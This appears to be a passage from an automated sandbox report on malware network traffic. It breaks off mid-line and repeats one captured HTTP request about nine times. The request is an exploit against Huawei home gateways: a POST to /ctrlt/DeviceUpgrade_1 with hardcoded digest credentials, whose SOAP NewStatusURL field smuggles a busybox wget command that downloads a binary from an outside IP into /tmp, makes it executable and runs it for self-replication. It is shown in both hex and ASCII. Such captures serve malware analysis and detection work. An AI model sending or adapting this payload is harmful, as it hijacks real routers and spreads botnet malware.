xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 